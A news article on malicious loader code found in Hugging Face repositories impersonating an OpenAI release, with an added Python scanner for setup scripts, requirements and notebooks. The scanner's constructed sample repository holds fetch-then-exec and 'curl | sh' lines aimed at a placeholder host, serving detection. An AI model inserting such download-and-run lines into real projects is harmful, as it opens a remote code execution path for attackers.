Malicious loader code in Hugging Face repo posed as OpenAI

Researchers found malicious loader code on Hugging Face posing as an OpenAI release; it fetched attacker-controlled code and six other repositories used nearly identical loaders.

Security firm HiddenLayer found loader code in a Hugging Face repository that impersonated an OpenAI release. The loader executed during repository setup and contacted attacker-controlled servers to retrieve additional code.

HiddenLayer identified six other Hugging Face repositories that used almost identical loader logic and connected to the same backend services. The firm reported the finding after investigating the original repository claim.

The malicious code was placed in peripheral repository files rather than inside the model weights: setup scripts, notebooks, dependency files and other repository code. Such files can run during setup, when developers execute notebooks or when packages are installed, creating an execution path that checks of the model weights alone would not reveal.

Sakshi Grover, senior research manager for cybersecurity services at IDC, warned: “Traditional software composition analysis was designed to inspect dependency manifests, libraries and container images; it is less effective at identifying malicious loader logic in AI repositories.”

HiddenLayer advised scanning repository code, dependency files and third-party install scripts in addition to checking model files and known malicious model signatures. The firm said platform operators should detect and block malicious loader patterns and restrict which repository files can run automatically.
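The scanning HiddenLayer recommends covers exactly the file classes named above (setup scripts, dependency files, notebooks), and a first pass at it can be a small static checker. The following is an added example written for this page, not HiddenLayer's tooling or code from the repositories described; the rule names and the sample repository it constructs (with hosts under example.invalid) are hypothetical.

```python
"""Added example (not HiddenLayer's tooling): scan a model-repository snapshot for
loader-style code in peripheral files. Rule names hypothetical; sample repo constructed."""
from __future__ import annotations
import ast
import json
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

# Signals worth a review, not proof of malice: network access from setup code,
# dynamic execution of computed data, dependencies pulled from outside the package
# index, and notebook shell magics that download content and pipe it to a shell.
NETWORK_MODULES = {"urllib", "requests", "http", "socket"}
DYNAMIC_EXEC = {"exec", "eval", "__import__"}
REMOTE_REQ_RE = re.compile(r"(https?://|git\+|file://)", re.IGNORECASE)
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")

@dataclass(frozen=True)
class Finding:
    path: str    # relative to the repository root
    rule: str
    detail: str

def _scan_python(text: str, rel: str) -> list[Finding]:
    try:
        tree = ast.parse(text)
    except SyntaxError as exc:
        return [Finding(rel, "unparseable-python", str(exc))]
    out = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            mods = [a.name for a in node.names] if isinstance(node, ast.Import) else [node.module or ""]
            for mod in mods:
                if mod.split(".")[0] in NETWORK_MODULES:
                    out.append(Finding(rel, "network-import", f"line {node.lineno}: {mod}"))
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id in DYNAMIC_EXEC:
            # exec()/eval() of a string literal is static; of computed data it is the loader shape
            if not (node.args and isinstance(node.args[0], ast.Constant)):
                out.append(Finding(rel, "dynamic-exec", f"line {node.lineno}: {node.func.id}() on computed data"))
    return out

def _scan_requirements(text: str, rel: str) -> list[Finding]:
    out = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if line and REMOTE_REQ_RE.search(line):
            out.append(Finding(rel, "remote-requirement", f"line {lineno}: {line}"))
    return out

def _scan_notebook(text: str, rel: str) -> list[Finding]:
    out = []
    for idx, cell in enumerate(json.loads(text).get("cells", [])):
        if cell.get("cell_type") != "code":
            continue
        source = "".join(cell.get("source", []))  # nbformat allows a string or a list of lines
        for line in source.splitlines():
            if PIPE_TO_SHELL_RE.search(line):
                out.append(Finding(rel, "pipe-to-shell", f"cell {idx}: {line.strip()}"))
    return out

def scan_repo(root: str | Path) -> list[Finding]:
    """Apply the file-class-specific checks to every file under the snapshot root."""
    root = Path(root)
    findings: list[Finding] = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        if path.suffix == ".py":
            handler = _scan_python
        elif path.name.startswith("requirements") and path.suffix == ".txt":
            handler = _scan_requirements
        elif path.suffix == ".ipynb":
            handler = _scan_notebook
        else:
            continue  # weights, configs, READMEs: not executable, out of scope for this check
        findings.extend(handler(path.read_text(encoding="utf-8", errors="replace"), rel))
    return findings

def build_sample_repo() -> str:
    """Constructed snapshot: benign metadata plus three peripheral files with the fetch-then-run shape."""
    root = Path(tempfile.mkdtemp(prefix="repo-scan-"))
    (root / "config.json").write_text(json.dumps({"model_type": "example", "hidden_size": 16}))
    (root / "setup.py").write_text(   # parsed only, never executed
        "from setuptools import setup\nfrom urllib.request import urlopen\n"
        "stage2 = urlopen('https://example.invalid/stage2.py').read()\nexec(stage2)\n"
        "setup(name='example-model-tools', version='0.0.1')\n")
    (root / "requirements.txt").write_text(
        "torch>=2.0\nhelper @ https://example.invalid/helper-0.1.tar.gz  # outside the index\n")
    notebook = {"cells": [
        {"cell_type": "markdown", "source": ["# Quickstart\n"]},
        {"cell_type": "code", "source": ["!curl -s https://example.invalid/env.sh | sh\n", "import torch\n"]}],
        "metadata": {}, "nbformat": 4, "nbformat_minor": 5}
    (root / "quickstart.ipynb").write_text(json.dumps(notebook))
    return str(root)

if __name__ == "__main__":
    for f in scan_repo(build_sample_repo()):
        print(f"{f.path:18} {f.rule:20} {f.detail}")
```

Run `scan_repo()` against a local snapshot of a repository before anything in it is installed or opened; each finding is a review signal rather than a verdict, which is why the rules report the line or cell so a reviewer can look at it. The benign `config.json` produces nothing, illustrating the article's point that a check confined to model files and their configuration would have seen a clean repository.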

The discovery follows other reports of poisoned AI software development kits and fake installers distributed on the same platform. An IDC FutureScape report from November 2025 recommended that by 2027, 60% of agentic AI systems should include a bill of materials to track component sources, approved versions and any executable pieces that could run during development or deployment.

Researchers highlighted that the risk comes from executable artifacts stored with models rather than from model weights themselves. They called for more rigorous repository-level scanning and stronger controls around repository files to reduce the chance that development workflows become a route into secure environments.
